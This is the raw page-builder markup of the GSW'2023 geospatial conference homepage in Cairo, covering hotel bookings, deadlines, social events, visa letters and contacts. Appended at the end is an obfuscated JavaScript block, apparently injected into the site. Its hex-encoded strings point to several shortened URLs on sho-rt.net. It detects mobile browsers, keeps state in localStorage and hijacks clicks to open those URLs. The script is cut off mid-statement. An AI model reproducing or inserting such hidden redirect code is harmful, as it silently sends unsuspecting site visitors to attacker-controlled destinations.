!important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 